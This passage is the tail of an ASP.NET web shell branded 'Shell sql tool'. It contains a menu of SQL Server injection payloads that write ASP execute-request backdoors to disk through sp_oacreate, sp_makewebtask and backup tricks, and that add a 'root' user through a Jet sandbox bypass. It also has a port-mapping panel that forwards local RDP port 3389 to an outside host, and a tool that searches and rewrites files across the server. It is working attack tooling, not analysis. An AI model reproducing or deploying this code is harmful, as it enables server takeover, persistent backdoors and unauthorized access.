exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
2537 </div>
2538 <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
2539 <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
2540 <div style="overflow-x:auto;width:950px" >
2541 <p>
2542 <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
2543 </p>
2544 </div>
2545 </div>
2546 </div>
2547 <%--PortMap--%>
2548 <div id="hOWTm" runat="server">
2549 <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2550 <tr align="center">
2551 <td style="width:5%"></td>
2552 <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
2553 <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
2554 <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
2555 <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
2556 <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
2557 <%--Search--%>
2558 <div id="yhv" runat="server">
2559 <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2560 <tr align="center">
2561 <td style="width:20%" align="left">Keyword</td>
2562 <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
2563 <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
2564 </tr>
2565 <tr align="center">
2566 <td style="width:20%" align="left">Replace As</td>
2567 <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
2568 <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
2569 </tr>
2570 <tr align="center">
2571 <td style="width:20%" align="left">Search FileType</td>
2572 <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
2573 <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
2574 </tr>
2575 <tr align="center">
2576 <td style="width:20%" align="left">Path</td>
2577 <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
2578 <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
2579 </tr>
2580 </table>
2581 <br/>
2582 <br/>
2583 <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
2584 <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
2585 </asp:Table>
2586 </div>
2587 </td></tr></table>
2588 <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://alikaptanoglu.blogspot.com" target="_blank">Shell sql tool</a> All Rights Reserved.</div></div>
2589 </form>
2590 </body>
2591 </html>